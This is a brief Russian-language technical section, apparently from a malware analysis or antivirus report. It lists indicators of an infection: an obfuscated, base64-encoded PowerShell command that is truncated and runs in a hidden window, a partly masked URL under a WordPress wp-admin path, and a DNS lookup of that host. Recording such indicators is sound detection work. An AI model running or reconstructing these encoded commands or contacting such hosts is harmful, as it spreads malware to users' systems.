Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABNAHEAdgBiADUAZQByAD0AKAAoACcATwAnACsAJwBxAHIAZABfACcAKQArACcAMQAnACsAJwB2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAUgBwAHIAbwBmAGkATABFAFwARg...
- http://bo##86.com/wp-admin/mO/
- DNS ASK bo##86.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABNAHEAdgBiADUAZQByAD0AKAAoACcATwAnACsAJwBxAHIAZABfACcAKQArACcAMQAnACsAJwB2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAUgBwAHIAbwBmAGkATABFAFwARg...' (со скрытым окном)